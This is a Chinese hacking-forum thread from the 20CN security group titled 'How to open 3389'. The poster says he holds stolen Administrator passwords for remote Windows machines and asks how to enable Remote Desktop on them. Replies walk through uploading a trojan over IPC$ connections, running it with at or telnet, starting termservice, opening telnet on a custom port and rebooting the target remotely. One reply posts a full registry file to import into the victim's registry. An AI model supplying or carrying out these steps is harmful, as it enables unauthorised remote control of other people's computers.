|
 | 作者: xtlyygy [xtlyygy]
 论坛用户 |
登录 |
| administrator用户的密码得到了不少,就是不知道怎样开3389. 请高手指教!!!!!!!!!!!!!!!!! |
| 地主 发表时间: 03/31 20:49 |
 | 回复: tyeying [zhouao]  论坛用户 |
登录 |
|
将他Terminal Services服务开了就行! |
| B1层 发表时间: 04/01 08:18 |
 | 回复: tianhei [tianhei]  论坛用户 |
登录 |
|
3389是各什吗东东啊 请高手赐教 |
| B2层 发表时间: 04/01 11:04 |
 | 回复: wjccn [wjccn] 论坛用户 |
登录 |
|
如果拥有了超级用户权限,对方是windows advance server系统! 你可以先用ipc连接它的计算机! 当然你拥有用户名和密码,这就很容易! 打开计算机的某个端口就必须让某个程序在这个端口运行。这样的话,利用ipc给它上传一个软件,是开启3389端口的。再利用网络命令让这个软件运行。呵呵! 现在你可以利用“终端服务客户端”来连接它! |
| B3层 发表时间: 04/01 13:44 |
 | 回复: tongliang [tongliang] 论坛用户 |
登录 |
|
对,具体的网络命令在这里就不讲了,可以去查 |
| B4层 发表时间: 04/01 14:02 |
| 回复: xtlyygy [xtlyygy] 论坛用户 |
登录 |
|
可是有一点要说明,我每次用at命令时,时间都过很久了,可是用IE打开的远端的计划任务时,总是显示,正在运行.扫描一下,还是没有开3389.这是怎么回事? |
| B5层 发表时间: 04/01 14:16 |
 | 回复: iqst [iqst] 论坛用户 |
登录 |
|
说明没有成功,不是每次进攻都能成功的,可能是哪个地方出问题了 |
| B6层 发表时间: 04/01 15:04 |
| 回复: tyeying [zhouao] 论坛用户 |
登录 |
|
如果你有管理员的权限就可用telnet来运行这个软件! telnet ip 输入帐号和密码 登陆进去之后,找到上传木马的那个目录,运行那木马就行了! |
| B7层 发表时间: 04/01 16:33 |
| 回复: yjyygywcw [yjyygywcw] 论坛用户 |
登录 |
|
ssdffdff |
| B8层 发表时间: 04/01 17:49 |
| 回复: ganjiawei [ganjiawei]  论坛用户 |
登录 |
|
你以为有管理员权限就可以TELNET了 |
| B9层 发表时间: 04/01 19:43 |
| 回复: ganjiawei [ganjiawei] 论坛用户 |
登录 |
|
你以为有管理员权限就可以TELNET了 |
| B10层 发表时间: 04/01 19:44 |
| 回复: tyeying [zhouao] 论坛用户 |
登录 |
|
你看看这里吧! http://www.20cn.org/cgi-bin/club/scripts/guest_show.pl?cat=security&forum=newbie&page=2&position=4478&id=1048994943 [此贴被 tyeying(zhouao) 在 04月01日20时11分 编辑过] [此贴被 tyeying(zhouao) 在 04月01日20时01分 编辑过] |
| B11层 发表时间: 04/01 19:48 |
| 回复: xtlyygy [xtlyygy] 论坛用户 |
登录 |
|
就是啊.只有开了23,才可以用telnet啊 |
| B12层 发表时间: 04/01 20:02 |
| 回复: tyeying [zhouao] 论坛用户 |
登录 |
|
所以叫你看<ipc$空连接的命令行问题?>这篇贴子呀! [此贴被 tyeying(zhouao) 在 04月01日20时34分 编辑过] |
| B13层 发表时间: 04/01 20:09 |
| 回复: xtlyygy [xtlyygy] 论坛用户 |
登录 |
|
我看过了.那是空连接啊.我说的是在我有管理权的时候,也不能用at这个命令.每次都说正在运行.晕~~~~~~~~~~~~~~~~~~ |
| B14层 发表时间: 04/01 20:16 |
| 回复: tyeying [zhouao] 论坛用户 |
登录 |
|
你就不能懂得变通一些吗?非要别人教你一步一步做吗? |
| B15层 发表时间: 04/01 20:23 |
| 回复: tyeying [zhouao] 论坛用户 |
登录 |
|
就是telnet ip-user:user-pass:pass-net start termservice就启动了他的终端服务,不过还要建一个连接! |
| B16层 发表时间: 04/01 20:29 |
| 回复: tyeying [zhouao] 论坛用户 |
登录 |
|
将如下脚本编辑成reg文件,导入对方的注册表就行了! Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\a1] "fEnableWinStation"=dword:00000001 "MaxInstanceCount"=dword:ffffffff "PdName"="tcp" "PdClass"=dword:00000002 "PdDLL"="tdtcp" "PdFlag"=dword:0000004e "OutBufLength"=dword:00000212 "OutBufCount"=dword:00000006 "OutBufDelay"=dword:00000064 "InteractiveDelay"=dword:0000000a "PortNumber"=dword:00000d3d "KeepAliveTimeout"=dword:00000000 "LanAdapter"=dword:00000000 "WdName"="Microsoft RDP 5.0" "WdDLL"="rdpwd" "WsxDLL"="rdpwsx" "WdFlag"=dword:00000036 "InputBufferLength"=dword:00000800 "CfgDLL"="RDPCFGEX.DLL" "WdPrefix"="RDP" "CdClass"=dword:00000000 "CdName"="" "CdDLL"="" "CdFlag"=dword:00000000 "Comment"="a1" "fInheritAutoLogon"=dword:00000001 "fInheritResetBroken"=dword:00000001 "fInheritReconnectSame"=dword:00000001 "fInheritInitialProgram"=dword:00000001 "fInheritCallback"=dword:00000000 "fInheritCallbackNumber"=dword:00000000 "fInheritShadow"=dword:00000001 "fInheritMaxSessionTime"=dword:00000001 "fInheritMaxDisconnectionTime"=dword:00000001 "fInheritMaxIdleTime"=dword:00000001 "fInheritAutoClient"=dword:00000001 "fInheritSecurity"=dword:00000000 "fPromptForPassword"=dword:00000001 "fResetBroken"=dword:00000000 "fReconnectSame"=dword:00000000 "fLogonDisabled"=dword:00000000 "fAutoClientDrives"=dword:00000000 "fAutoClientLpts"=dword:00000001 "fForceClientLptDef"=dword:00000001 "fDisableEncryption"=dword:00000000 "fHomeDirectoryMapRoot"=dword:00000000 "fUseDefaultGina"=dword:00000000 "fDisableCpm"=dword:00000000 "fDisableCdm"=dword:00000001 "fDisableCcm"=dword:00000001 "fDisableLPT"=dword:00000000 "fDisableClip"=dword:00000000 "fDisableExe"=dword:00000000 "fDisableCam"=dword:00000001 "Username"="" "Domain"="" "Password"="" "WorkDirectory"="" "InitialProgram"="" "CallbackNumber"="" "Callback"=dword:00000000 "Shadow"=dword:00000000 "MaxConnectionTime"=dword:00000000 "MaxDisconnectionTime"=dword:00000000 "MaxIdleTime"=dword:00000000 "KeyboardLayout"=dword:00000000 "MinEncryptionLevel"=dword:00000002 "NWLogonServer"="" "WFProfilePath"="" [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\a1\UserOverride] [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\a1\UserOverride\Control Panel] [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\a1\UserOverride\Control Panel\Desktop] "Wallpaper"="(None)" |
| B17层 发表时间: 04/01 20:31 |
| 回复: bking [bking]  版主 |
登录 |
|
用net进行ipc$连接,将要上传的文件copy目标机上。 用opentelnet打开他的telnet端口。 在用telnet XXX.XXX.XXX port登陆上目标机.(注意port是用opentelnet开的port.不是默认的23端口) |
| B18层 发表时间: 04/02 00:51 |
| 回复: xtlyygy [xtlyygy] 论坛用户 |
登录 |
|
怎么没人理解我的意思啊.晕~~~~~~ 不管传木马也好.其它东东都也行.可关键如何让远端执行它呢? 用at命令总是说正在运行.晕~~ [此贴被 时光机(xtlyygy) 在 04月03日20时29分 编辑过] |
| B19层 发表时间: 04/03 20:04 |
| 回复: xtlyygy [xtlyygy] 论坛用户 |
登录 |
|
再问一下问题,如何让对方的机子重新启动? |
| B20层 发表时间: 04/03 20:23 |
| 回复: xtlyygy [xtlyygy] 论坛用户 |
登录 |
|
再问一下问题,如何让对方的机子重新启动? |
| B21层 发表时间: 04/03 20:43 |
 | 回复: cyshaoping [cyshaoping] 论坛用户 |
登录 |
|
如果at命令可以用就行 |
| B22层 发表时间: 04/03 20:45 |
 | 回复: xfans [molmd] 论坛用户 |
登录 |
|
重起机子啊~是shutdown \\ip time |
| B23层 发表时间: 04/04 11:43 |
| 回复: xtlyygy [xtlyygy] 论坛用户 |
登录 |
|
终于TELNET上去了.可就是找不到开3389的代码,请问谁知道啊. 以前下载的那个是假的,不能用.晕~~~~~~~~~~~~~~ |
| B24层 发表时间: 04/04 11:56 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 如何开3389